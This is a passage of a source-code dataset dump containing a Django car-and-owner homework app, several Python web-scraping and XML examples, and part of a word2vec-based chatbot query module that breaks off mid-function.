"content_id": "a9e96e8e3ff5c6265426b5231569f07775b6780a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 954,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 30,
"path": "/dj_views_and_tmps/cars/admin.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Owner, Engine, Manufacturer, Car, Car_Owner\n\n\nclass Car_OwnerInline(admin.TabularInline):\n model = Car_Owner\n extra = 1\n\n\[email protected](Owner)\nclass OwnerAdmin(admin.ModelAdmin):\n inlines = (Car_OwnerInline,)\n list_display = ('name', 'surname', 'age', 'gender')\n empty_value_display = 'Empty'\n fields = ('name', 'surname', 'age', 'gender',)\n\n\[email protected](Car)\nclass CarAdmin(admin.ModelAdmin):\n inlines = (Car_OwnerInline,)\n list_display = ['id', 'engine', 'manufacturer', 'color', 'build_date',]\n date_hierarchy = 'build_date'\n list_display_links = ('id',)\n list_editable = ('color', 'engine', 'manufacturer',)\n list_filter = ('build_date', )\n search_fields = ('color',)\n # fields = ('engine', 'manufacturer', 'color', 'seats_num',)\n fieldsets = (\n ('Options', {'fields': ('engine', 'manufacturer', 'color', 'seats_num', 'mileage',)}),\n )\n"
},
{
"alpha_fraction": 0.6124546527862549,
"alphanum_fraction": 0.6130592226982117,
"avg_line_length": 24.84375,
"blob_id": "11f38105ca661dd21416c15ee9873e806d591759",
"content_id": "6f02a6741a10b118ef86f67cff8acc46e19072e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1654,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 64,
"path": "/dj_views_and_tmps/cars/views.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.core.urlresolvers import reverse_lazy\nfrom django.db.models import Q\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\n\nfrom cars.models import Owner\n\n\nclass OwnerDetailView(DetailView):\n model = Owner\n\n def get_context_data(self, **kwargs):\n context = super(OwnerDetailView, self).get_context_data(**kwargs)\n return context\n\n\nclass OwnerListView(ListView):\n model = Owner\n paginate_by = 5\n\n def get_context_data(self, **kwargs):\n context = super(OwnerListView, self).get_context_data(**kwargs)\n return context\n\n def get_queryset(self):\n owners = Owner.objects.all()\n query = self.request.GET.get('query')\n if query:\n owners = Owner.objects.filter(Q(name__contains=query) | Q(surname__contains=query)\n | Q(gender__contains=query))\n sort_by = self.request.GET.get('by')\n if sort_by:\n sort_by = self.request.GET.get('in') + sort_by.lower()\n owners = Owner.objects.order_by(sort_by)\n return owners\n\n\nclass OwnerCreateView(CreateView):\n model = Owner\n fields = (\n 'name',\n 'surname',\n 'age',\n 'gender',\n 'photo',\n )\n\n\nclass OwnerUpdateView(UpdateView):\n model = Owner\n fields = (\n 'name',\n 'surname',\n 'age',\n 'gender',\n 'photo',\n )\n template_name_suffix = '_update_form'\n\n\nclass OwnerDeleteView(DeleteView):\n model = Owner\n success_url = reverse_lazy('owner_list')\n"
},
{
"alpha_fraction": 0.6415841579437256,
"alphanum_fraction": 0.6415841579437256,
"avg_line_length": 44.90909194946289,
"blob_id": "3c73dabcbc0a7597375f69e18b67ed02fbea27f8",
"content_id": "32c9e701ff74c9ec112a1923996e11a8b9b9bf28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 11,
"path": "/dj_views_and_tmps/cars/urls.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\n\nfrom cars import views\n\nurlpatterns = [\n url(r'^$', views.OwnerListView.as_view(), name='owner_list'),\n url(r'^(?P<pk>\\d+)/$', views.OwnerDetailView.as_view(), name='owner_detail'),\n url(r'^create/$', views.OwnerCreateView.as_view(success_url=\"/\"), name='owner_create'),\n url(r'^(?P<pk>\\d+)/edit/$', views.OwnerUpdateView.as_view(), name='owner_edit'),\n url(r'^(?P<pk>\\d+)/delete/$', views.OwnerDeleteView.as_view(success_url=\"/\"), name='owner_delete'),\n]\n"
},
{
"alpha_fraction": 0.6157894730567932,
"alphanum_fraction": 0.6192982196807861,
"avg_line_length": 34.6875,
"blob_id": "eed944b2ced80969c9efbb2dac553f4867f1fde8",
"content_id": "e7463d7adaf36726bebcbb0fbf909e2e717da29b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 570,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/dj_views_and_tmps/templates/cars/owner_detail.html",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% block title %}\n{{ owner.name }} {{ owner.surname }} details\n{% endblock %}\n{% block content %}\n<h2>Owner details</h2>\n<img src=\"{{ owner.photo.url }}\" class=\"img-responsive img-thumbnail\">\n<hr>\n<p>Name: {{ owner.name }}</p>\n<p>Surname: {{ owner.surname }}</p>\n<p>Age: {{ owner.age }}</p>\n<p>Gender: {{ owner.gender }}</p>\n<a href=\"{{ owner.get_absolute_url }}edit\" class=\"btn btn-primary\">Edit</a>\n<a href=\"{{ owner.get_absolute_url }}delete\" class=\"btn btn-danger\">Delete</a>\n<a href=\"/\" class=\"btn btn-primary\">Main page</a>\n{% endblock %}"
},
{
"alpha_fraction": 0.6593103408813477,
"alphanum_fraction": 0.6710344552993774,
"avg_line_length": 28,
"blob_id": "b770cf2c27ad84eff82e3e6101ee4f15e1b7c213",
"content_id": "303fa230337fc78cae2e7c9077ceafe430889582",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1450,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 50,
"path": "/dj_views_and_tmps/cars/models.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.core.urlresolvers import reverse\n\n\nclass Owner(models.Model):\n name = models.CharField(max_length=200)\n surname = models.CharField(max_length=200)\n age = models.IntegerField()\n gender = models.CharField(max_length=30)\n photo = models.ImageField(upload_to='photos/', default='photos/None/no-img.jpg')\n\n def get_absolute_url(self):\n return reverse('owner_detail', kwargs={'pk': self.pk})\n\n def __str__(self):\n return '%s %s' % (self.name, self.surname)\n\n\nclass Engine(models.Model):\n engine_type = models.CharField(max_length=30)\n capacity = models.FloatField()\n fuel_type = models.CharField(max_length=30)\n\n def __str__(self):\n return '%s engine, fuel: %s' % (self.engine_type, self.fuel_type)\n\n\nclass Manufacturer(models.Model):\n name = models.CharField(max_length=200)\n\n def __str__(self):\n return '%s' % self.name\n\n\nclass Car(models.Model):\n owner = models.ManyToManyField(Owner, through='Car_Owner')\n engine = models.ForeignKey(Engine)\n manufacturer = models.ForeignKey(Manufacturer)\n color = models.CharField(max_length=30)\n seats_num = models.IntegerField()\n build_date = models.DateField()\n mileage = models.IntegerField()\n\n def __str__(self):\n return '%s %s vehicle' % (self.color, self.manufacturer)\n\n\nclass Car_Owner(models.Model):\n owner = models.ForeignKey(Owner)\n car = models.ForeignKey(Car)\n"
},
{
"alpha_fraction": 0.4925650656223297,
"alphanum_fraction": 0.4925650656223297,
"avg_line_length": 24.619047164916992,
"blob_id": "13c9a98b9f666e6b8699707ce1d4c35915af048d",
"content_id": "c68f764dc3c19c909073bc139a89fd5e934f0ba8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 21,
"path": "/dj_views_and_tmps/cars/forms.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm, TextInput\n\nfrom .models import Owner\n\n\nclass CreateOwner(ModelForm):\n class Meta:\n model = Owner\n fields = (\n 'name',\n 'surname',\n 'age',\n 'gender',\n 'photo',\n )\n widgets = {\n 'name': TextInput(attrs={'requred': True}),\n 'surname': TextInput(attrs={'required': True}),\n 'age': TextInput(attrs={'required': True}),\n 'gender': TextInput(attrs={'required': True}),\n }\n"
},
{
"alpha_fraction": 0.5268781185150146,
"alphanum_fraction": 0.5378965139389038,
"avg_line_length": 36.4375,
"blob_id": "57e47481796b2da22a138f978cfd980077e2da8d",
"content_id": "8d1d39ed3a2574cb7eeb3ce0ba1d785dcf1f1490",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2995,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 80,
"path": "/dj_views_and_tmps/cars/migrations/0001_initial.py",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.8 on 2016-07-31 20:11\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Car',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('color', models.CharField(max_length=30)),\n ('seats_num', models.IntegerField()),\n ('build_date', models.DateField()),\n ('mileage', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='Car_Owner',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('car', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Car')),\n ],\n ),\n migrations.CreateModel(\n name='Engine',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('engine_type', models.CharField(max_length=30)),\n ('capacity', models.FloatField()),\n ('fuel_type', models.CharField(max_length=30)),\n ],\n ),\n migrations.CreateModel(\n name='Manufacturer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Owner',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=200)),\n ('surname', models.CharField(max_length=200)),\n ('age', models.IntegerField()),\n ('gender', models.CharField(max_length=30)),\n ],\n ),\n migrations.AddField(\n model_name='car_owner',\n name='owner',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Owner'),\n ),\n migrations.AddField(\n model_name='car',\n name='engine',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Engine'),\n ),\n migrations.AddField(\n model_name='car',\n name='manufacturer',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cars.Manufacturer'),\n ),\n migrations.AddField(\n model_name='car',\n name='owner',\n field=models.ManyToManyField(through='cars.Car_Owner', to='cars.Owner'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7346938848495483,
"alphanum_fraction": 0.7346938848495483,
"avg_line_length": 23.5,
"blob_id": "222123ee541dedf3d913d51018637c90b6a4f5e1",
"content_id": "7b588bba5510ba33911fab55467e1da84f9491aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 2,
"path": "/README.md",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "Домашнее задание по админке и статике. \nАвраменко Демид.\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.604347825050354,
"avg_line_length": 24.61111068725586,
"blob_id": "e89c53f5cd2219945df357c707266f2b2b4906c5",
"content_id": "e1b3127a158aa4641f2fa9aec82e45af952cb373",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 18,
"path": "/dj_views_and_tmps/templates/cars/owner_update_form.html",
"repo_name": "true-datura/Django_view_and_templates_hw",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% block title %}\nEditing\n{% endblock %}\n{% block content %}\n<h2>Edit object</h2>\n<img src=\"{{ owner.photo.url }}\" class=\"img-responsive img-thumbnail\">\n<hr>\n<form action=\"\" method=\"POST\" enctype=\"multipart/form-data\">\n {% csrf_token %}\n <table>\n {{ form.as_table }}\n </table>\n <br>\n <button type=\"submit\" class=\"btn btn-primary\">Save</button>\n <a href=\"/\" class=\"btn btn-danger\">Cancel</a>\n</form>\n{% endblock %}"
}
] | 9 |
biofantasy/pratices-log-blog | https://github.com/biofantasy/pratices-log-blog | 7eced77b61b9bb0cab28599d29146edeb28fba42 | 2081b4c9ad352e614600ed8f00686eff9b5bb2da | 9a225ed5b0c8a36f2bdafd03c2f03730bd8e65ad | refs/heads/master | 2020-06-17T20:45:39.373517 | 2019-07-16T16:54:44 | 2019-07-16T16:54:44 | 196,048,613 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6372548937797546,
"alphanum_fraction": 0.6552287340164185,
"avg_line_length": 28.190475463867188,
"blob_id": "f2c467102d54ba789e33c219cb88bc98de6f343f",
"content_id": "b8db1acd2a92d7fc85f6a7e5212799372d04bcbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 21,
"path": "/crawler/Python/non_utf.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import html5lib\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nresp = requests.get('https://www.ptwxz.com/html/7/7580/')\n##設置查詢網頁編碼 預設為utf-8?\nresp.encoding = 'gbk'\nsoup = BeautifulSoup(resp.text, 'html.parser')\ntitle = soup.find('div', 'title').text.strip()\ncontents = list()\n\nprint('title :', title)\nfor charpter in soup.find_all('a', {'href': re.compile('[0-9]+.html')}):\n contents.append(charpter.text.strip())\n print('charpter :',charpter.text.strip())\n\nwith open(title + '.txt', 'w', encoding='utf-8') as f:\n for content in contents:\n f.write(content)\n f.write('\\n')"
},
{
"alpha_fraction": 0.6848591566085815,
"alphanum_fraction": 0.6883803009986877,
"avg_line_length": 20.884614944458008,
"blob_id": "622c19da52b4d79393f52833570e89a3976daaa9",
"content_id": "6f72254bfd0cfcddb96cf2223e2395d87b80b4a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 26,
"path": "/crawler/Python/Post/login.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\n\nURL = 'LoginWebAddress'\n\n## 創建 Session 物件\ns = requests.Session()\n\n## 先瀏覽網頁, 取得 crsf token\nresp = s.get(URL)\nsoup = BeautifulSoup(resp.text, 'html5lib')\ncrsf = soup.find('form', id='ajax-login').find('input', 'crsftok')['value']\n\n##傳送表單資料並登入 依照 Form Data 傳送資料建立, 此範例為: crsftok, email, password\nform_data = {\n 'email': 'YourAccount',\n 'password': 'YourPassword',\n 'crsftok': crsf\n}\n\nresp = s.post(URL, data=form_data)\n\n## 登入成功後, 相關資訊皆保留在 session 物件中, 可以直接索取相關網頁資訊\nresp = s.get('UserInfoWebAddress')\n\nprint(resp.text)"
},
{
"alpha_fraction": 0.5890257358551025,
"alphanum_fraction": 0.6030235290527344,
"avg_line_length": 29.169490814208984,
"blob_id": "204cd7080135d569f5302f79c53767b2dd375433",
"content_id": "1b6a7bebf930ccb32dffc94c869273cf0302db1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2002,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 59,
"path": "/crawler/Python/ezprice_to_csv.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import html5lib\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nimport csv\n\ndef write_csv_1(items):\n with open('ezprice.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(('品項', '價格', '商家'))\n for item in items:\n writer.writerow((column for column in item))\n\n##正式寫入檔案前 先寫入 BOM(Byte Order Mark) 檔案頭 (Windows特有 Mac,Linux可能有相容性問題)\ndef write_csv_2(items):\n with open('ezprice.csv', 'wb') as f:\n f.write(b'\\xEF\\xBB\\xBF')## 在檔案頭加上utf-8編碼的 BOM\n with open('ezprice.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(('品項', '價格', '商家'))\n for item in items:\n writer.writerow((column for column in item))\n \ndef read_csv():\n with open('ezprice.csv', 'r', encoding='utf-8') as f:\n reader = csv.DictReader(f)\n for row in reader:\n print(row['品項'], row['價格'], row['商家'])\n\nquery = 'thinkpad'\n##文字與數字相加 : TypeError: can only concatenate str (not \"int\") to str\nlowestPrice = 'lp=15000' \nhighestPrice = 'hp=60000' \n\npage = requests.get('https://ezprice.com.tw/s/' + query + '/?' + lowestPrice +'&'+ highestPrice).text\nsoup = BeautifulSoup(page, 'html5lib')\nitems = list()\n\nfor div in soup.find_all('div', 'search-rst clearfix'):\n item = list()\n item.append(div.h2.a.text.strip()) #商品名稱\n ## 先取得價格字串\n price = div.find('span', 'num').text\n ## 在移除其中非數字部分 (以空白字串取代非0-9的字元)\n price = re.sub(r'[^0-9]', '', price)\n item.append(price)\n ## 若商家區塊存在則取出商家名稱\n if div.find('span', 'platform-name'):\n item.append(div.find('span', 'platform-name').text.strip())\n else:\n item.append('無')\n items.append(item)\n\nprint('共 %d 項產品' %(len(items)))\n\nwrite_csv_1(items)\n\nread_csv()\n \n\n"
},
{
"alpha_fraction": 0.6772152185440063,
"alphanum_fraction": 0.6835442781448364,
"avg_line_length": 23.30769157409668,
"blob_id": "7fcea79943251de67115d06383f7fb023d9b2715",
"content_id": "029c4bf59ca92d1406a4c490e46ef082ac076f0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 13,
"path": "/crawler/Python/Xml/read_xml.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "import xml.etree.ElementTree as ET\n\ntree = ET.parse('example.xml')\nroot = tree.getroot()\nprint(root.attrib)\ntotal = root.attrib['totalResults']\nmovies = list()\nfor tag in root.findall('result'):\n print(tag.attrib)\n movies.append(tag.attrib['title'])\n\nprint('共', total, '筆資料, 前 10 筆')\nprint('\\n' .join(movies))\n"
},
{
"alpha_fraction": 0.49643221497535706,
"alphanum_fraction": 0.6187563538551331,
"avg_line_length": 38.20000076293945,
"blob_id": "e57a908720902c355f6b0ad3a76dede9df2e2e8e",
"content_id": "e8881b0b9cf64f4f2714889f5c37021665e096ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 25,
"path": "/crawler/Python/Xml/save_xml.py",
"repo_name": "biofantasy/pratices-log-blog",
"src_encoding": "UTF-8",
"text": "from xml.etree.ElementTree import Element, SubElement, tostring\nfrom xml.dom import minidom\n\ndata = [\n [\"Iron Man\",\"2008\",\"tt0371746\",\"movie\"],\n [\"Iron Man 3\",\"2013\",\"tt1300854\",\"movie\"],\n [\"Iron Man 2\",\"2010\",\"tt1228705\",\"movie\"],\n [\"The Man in the Iron Mask\",\"1998\",\"tt0120744\",\"movie\"],\n [\"The Man with the Iron Fists\",\"2012\",\"tt1258972\",\"movie\"],\n [\"Tetsuo, the Iron Man\",\"1989\",\"tt0096251\",\"movie\"],\n [\"The Man with the Iron Heart\",\"2017\",\"tt3296908\",\"movie\"],\n [\"The Invincible Iron Man\",\"2007\",\"tt0903135\",\"movie\"],\n [\"Iron Man: Rise of Technovore\",\"2013\",\"tt2654124\",\"movie\"],\n [\"The Man with the Iron Fists 2\",\"2015\",\"tt3625152\",\"movie\",]\n]\n\nroot = Element('root', {'totalResults': '81', 'response': 'True'})\nfor d in data:\n SubElement(root, 'result',\n {'title': d[0], 'year': d[1], 'imdbID': d[2], 'type': d[3]}\n )\n\nraw_str = tostring(root, 'utf-8')\nparsed = minidom.parseString(raw_str)\nprint(parsed.toprettyxml(indent=\" \"))\n\n"
}
] | 5 |
tt2615/BC3409-chatbot | https://github.com/tt2615/BC3409-chatbot | 0fb56df7a4c40df290c07aa4f4da8b112914026e | a4ede702842c300f9fc95ccfa44898d5aaecbe99 | c0c95652231d091bf815a2ae9f85472d1f176ec6 | refs/heads/master | 2023-08-08T02:49:41.900943 | 2020-04-13T11:34:46 | 2020-04-13T11:34:46 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6067144870758057,
"alphanum_fraction": 0.6121553182601929,
"avg_line_length": 29.63257598876953,
"blob_id": "cd8fb04a74fecbc3a3320cb6cc3a9673044a68c8",
"content_id": "28611eff0b59a7e0bd3e76f3efd0a81476a881a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16174,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 528,
"path": "/BC3409DEMO/main/query.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "# Standard suite\nimport csv\nimport numpy as np\nimport time\nimport warnings\nimport traceback\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\nimport random\n\n# Word embedding module\nimport gensim\n\n# NLP modules\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import pos_tag\nfrom autocorrect import spell\n\n# Vector comparison module\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nstart_time = time.clock()\nmodel = gensim.models.KeyedVectors.load_word2vec_format(r\".\\GoogleNews-vectors-negative300.bin.gz\", binary=True)#, limit = 5000)\nend_time = time.clock()\nprint('Embeddings successfully loaded!')\nprint('Time elapsed:', end_time - start_time, 'seconds')\ndatarows = []\nclass question:\n def __init__(self, string):\n self.string = string\n self.all_keywords = None\n self.unprocessed_keywords = None\n self.processed_keywords = None\n self.interrogative = None\n self.vector = None\n\nclass datarow:\n def __init__(self, question):\n self.question = question\n self.answer = None\n self.interrogative = None\n self.vector = None\n\nclass result:\n def __init__(self, question, sim, interrogative, answer):\n self.question = question\n self.sim = sim\n self.interrogative = interrogative\n self.answer = answer\n\n\ndef load_csv_into_memory(df):\n \"\"\" Load dataset into memory. Run once at the start of application.\n\n Keyword arguments:\n directory -- file directory of .csv file with question-answer pairs\n\n \"\"\"\n loaded_vectors = []\n\n for index, row in df.iterrows():\n try:\n current = datarow(row[\"question\"])\n current.answer = row[\"answer\"]\n current.interrogative = row[\"interrogative\"]\n datarows.append(current)\n\n # Process read-in line\n keyword_list, unprocessed_words, vector = process(row[\"question\"])\n current.vector = vector\n\n while 'i' in keyword_list:\n keyword_list.remove('i')\n\n if np.isnan(current.vector[0]):\n print(\"ZERO VECTOR ALERT\")\n continue\n\n except:\n print(\"FAIL\")\n traceback.print_exc()\n continue\n\n print(\"Datarows loaded: {}\".format(len(datarows)))\n\n\ndef process(question, debug = False):\n \"\"\" Processes a string question, identifying keywords and computing its semantic vector.\n\n Keyword arguments:\n question -- string representation of a question\n\n Returns:\n keyword_list -- identified keywords in the input question\n semantics_vector -- semantics vector of the input question\n\n \"\"\"\n keyword_list = get_lemmatized_keywords(question, debug)\n semantics_vector, unprocessed_words = get_semantics_vector(keyword_list, debug)\n\n return keyword_list, unprocessed_words, semantics_vector\n\n\ndef get_lemmatized_keywords(question, debug = False):\n \"\"\" Process a question.\n\n Keyword arguments:\n question -- question provided in string form\n\n Returns:\n keyword_list -- list of string keywords\n sentence_vector -- symantic row vector of length 300 representing meaning of the word, created by summing the word vectors\n of keywords in the question and dividing the result by the number of keywords\n \"\"\"\n\n # Tokenize\n tokenized_data = word_tokenize(question)\n\n # Cast to lower-case\n tokenized_lower = []\n for word in tokenized_data:\n tokenized_lower.append(word.lower())\n\n # Remove stop words\n tokenized_lower_stopwords = remove_stopwords(tokenized_lower)\n\n # Spellcheck\n tokenized_lower_stopwords_spellchecked = spellcheck(tokenized_lower_stopwords, debug)\n\n # Part-of-speech tagging/keyword extraction\n keyword_list = extract_keywords(tokenized_lower_stopwords_spellchecked)\n\n # Lemmatize\n keyword_list_lemmatized = lemmatize(keyword_list)\n\n # Cast to US-English\n keyword_list_lemmatized_casted = []\n for word in keyword_list_lemmatized:\n keyword_list_lemmatized_casted.append(uk_to_us(word))\n\n return keyword_list_lemmatized_casted\n\n\ndef get_semantics_vector(word_list, debug = False):\n \"\"\" Get semantics vector of a list of words by averaging over the semantics vector of each individual word.\n\n Keyword arguments:\n word_list -- list of strings to be averaged over\n\n Returns:\n semantics_vector -- average semantics vector of the input list of strings\n \"\"\"\n\n unprocessed_words = []\n\n semantics_vector = np.zeros(300,)\n word_count = 0\n miscount = 0\n for word in word_list:\n try:\n semantics_vector += model.get_vector(word)\n word_count += 1\n except KeyError:\n if debug:\n miscount += 1\n print(\"{} word not found in dictionary ({})\".format(miscount, word))\n unprocessed_words.append(word)\n if word_count > 0:\n semantics_vector /= word_count\n\n return semantics_vector, unprocessed_words\n\n\ndef uk_to_us(uk_in):\n with open(r'.\\uk_to_us.csv', mode='r') as infile:\n reader = csv.reader(infile)\n conversion_dict = {rows[0]:rows[1] for rows in reader}\n\n try:\n us_out = conversion_dict[uk_in]\n return us_out\n except:\n return uk_in\n\n\ndef remove_stopwords(word_list):\n \"\"\" Remove stopwords from a list of words.\n\n Keyword arguments:\n word_list -- list of strings from which stopwords should be removed from\n\n Returns:\n word_list_out -- list of strings with stopwords removed\n \"\"\"\n\n word_list_out = []\n stopWords = set(stopwords.words('english'))\n\n # Adding custom stopwords\n stopWords.add('pregnant')\n stopWords.add('pregnancy')\n stopWords.remove('more')\n\n for word in word_list:\n if word not in stopWords:\n word_list_out.append(word)\n\n return word_list_out\n\n\ndef spellcheck(word_list, debug = False):\n \"\"\" Spellcheck a list of words using the autocorrect library.\n\n Keyword arguments:\n word_list -- list of strings to be spellchecked\n\n Returns:\n spellchecked_word_list -- list of spellchecked strings\n \"\"\"\n\n spellchecked_word_list = []\n for word in word_list:\n spellchecked_word_list.append(word) #spell(word)\n\n if debug:\n print(\"Keywords before spellcheck: \\t{}\".format(word_list))\n print(\"Keywords after spellcheck: \\t{}\".format(spellchecked_word_list))\n\n return spellchecked_word_list\n\ndef extract_keywords(word_list):\n \"\"\" Extract keywords from a list of strings using their POS tag.\n\n Keyword arguments:\n word_list -- list of strings to be checked for importance\n\n Returns:\n keyword_list -- list of keyword strings\n \"\"\"\n\n singulars = []\n for word in word_list:\n if len(word) == 1:\n singulars.append(word)\n\n word_list = [word for word in word_list if word not in singulars]\n\n tup_list = pos_tag(word_list)\n target_tags = {'NN', 'NNS', 'NNP', 'NNPS', 'VB', 'VBD', 'VBG', 'VBN', 'JJ', 'JJR', 'JJS', 'WRB', 'MD',\n 'CD', 'RB', 'RBR', 'RBS', 'JJ', 'JJR', 'JJS', 'IN'}\n keyword_list = []\n\n for tup in tup_list:\n if tup[1] in target_tags:\n keyword_list.append(tup)\n\n return keyword_list\n\ndef lemmatize(word_list):\n \"\"\" Lemmatize a list of words using their POS tag if possible.\n\n Keyword arguments:\n word_list -- list of strings to be lemmatized\n\n Returns:\n word_list_lemmatized -- list of lemmatized strings\n \"\"\"\n\n wordnet_lemmatizer = WordNetLemmatizer()\n word_list_lemmatized = []\n\n for word in word_list:\n if word[0].isalpha():\n try:\n word_list_lemmatized.append(wordnet_lemmatizer.lemmatize(word[0], pos=penn_to_wn(word[1])))\n except:\n try:\n word_list_lemmatized.append(wordnet_lemmatizer.lemmatize(word[0]))\n except:\n pass\n\n return word_list_lemmatized\n\ndef find_interrogative(q):\n interrogative_words = ['who', 'why', 'where', 'what', 'when', 'how', 'can', 'should', 'will', 'do']\n prime_interrogative_words = ['who', 'why', 'where', 'what', 'when', 'how']\n\n interrogatives_identified = []\n\n for word in q.string.lower().split():\n if word in interrogative_words:\n interrogatives_identified.append(word)\n\n interrogatives_identified = ['should' if inter == \"can\" else inter for inter in interrogatives_identified]\n\n if len(interrogatives_identified) == 1:\n q.interrogative = interrogatives_identified[0]\n return interrogatives_identified[0]\n elif len(interrogatives_identified) > 1:\n for inter in interrogatives_identified:\n if inter in prime_interrogative_words:\n q.interrogative = inter\n return inter\n q.interrogative = interrogatives_identified[0]\n return interrogatives_identified[0]\n\n\n\ndef sim_to_question(sim, results):\n for result in results:\n if (abs(sim-result.sim) < 1e-9):\n return result.question\n print(\"SIMILARITY LOOKUP ERROR\")\n\ndef question_to_datarow(question, datarows):\n for datarow in datarows:\n if question == datarow.question:\n return datarow\n print(\"DATAROW LOOKUP ERROR\")\n\n\ndef query(q, debug = False):\n \"\"\" Query the dataset.\n\n Keyword arguments:\n q -- question object\n debug -- set boolean as True to also print predicted question\n\n Returns:\n target answer -- predicted answer in string form\n\n \"\"\"\n #probability\n\n prb = []\n\n ## QUESTION:\n\n quest = []\n\n # results\n results = []\n \n # Process s using engine import\n q.all_keywords, q.unprocessed_keywords, q.vector = process(q.string, debug)\n q.vector = np.reshape(q.vector, (1, -1))\n find_interrogative(q)\n\n q.processed_keywords = [word for word in q.all_keywords if word not in q.unprocessed_keywords]\n\n print(\"Final processed keywords:\\t{}\".format(q.processed_keywords))\n\n # Iterate through all dataset questions, storing dataset question-similarity pairs in similarity_dict\n similarity_dict = 